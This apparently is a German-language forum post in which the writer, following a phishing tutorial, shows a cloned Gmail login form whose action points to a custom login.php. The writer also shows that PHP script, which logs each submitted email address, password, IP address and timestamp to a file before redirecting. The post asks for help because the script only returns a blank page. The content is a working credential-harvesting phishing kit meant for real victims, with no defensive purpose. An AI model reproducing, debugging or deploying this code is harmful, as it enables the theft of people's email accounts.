Also ich will es mit der Phishing-methode probieren. Ich hab mich an dem Tutorial
http://www.toolbase.bz/board/topic/300-tut-phishing-tutorial-by-paulaabdul-1/
orientiert.
Allerdings steh ich schon am Anfang an. Zuerst der interessante Teil der gmail.html, die ich abgespeichert hab:
<form novalidate="" method="post" action="login.php" id="gaia_loginform">
<input name="GALX" type="hidden" value="MlTgl6VfDaE">
<input name="continue" type="hidden" value="
Please Login HERE or Register HERE to see this link!
<input name="service" type="hidden" value="mail">
<input name="hl" type="hidden" value="en">
<input type="hidden" id="_utf8" name="_utf8" value="☃">
<input type="hidden" name="bgresponse" id="bgresponse" value="js_disabled">
<input type="hidden" id="pstMsg" name="pstMsg" value="1">
<input type="hidden" id="dnConn" name="dnConn" value="">
<input type="hidden" id="checkConnection" name="checkConnection" value="youtube:128:1">
<input type="hidden" id="checkedDomains" name="checkedDomains" value="youtube">
<label class="hidden-label" for="Email">Email</label>
<input id="Email" name="Email" type="email" placeholder="Email" value="" spellcheck="false" class="">
<label class="hidden-label" for="Passwd">Password</label>
<input id="Passwd" name="Passwd" type="password" placeholder="Password" class="">
<input id="signIn" name="signIn" class="rc-button rc-button-submit" type="submit" value="Sign in">
Dann hab ich die Datei login.php erstellet. Die schaut so aus:
<?php
$go = fopen("logs","a+");
$timestamp = time();
$datum = date("d.m.Y - H:i:s", $timestamp);
$mail = $_POST["Email"];
$pass = $_POST["Passwd"];
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($go, "Hoster: Google");
fwrite($go, "Datum: " . "$datum n");
fwrite($go, "E-Mail: " . "$mail n");
fwrite($go, "Password: " . "$pass n");
fwrite($go, "Ip: " . "$ip n");
fwrite($go, " n");
fclose($go);
header('Location:
Please Login HERE or Register HERE to see this link!
?>
Wenn ich also gmail aufrufe, email und Passwort eingebe und auf sign-in klick, tut sich nur eine leere login.php Seite auf.
Was hab ich falsch gemacht?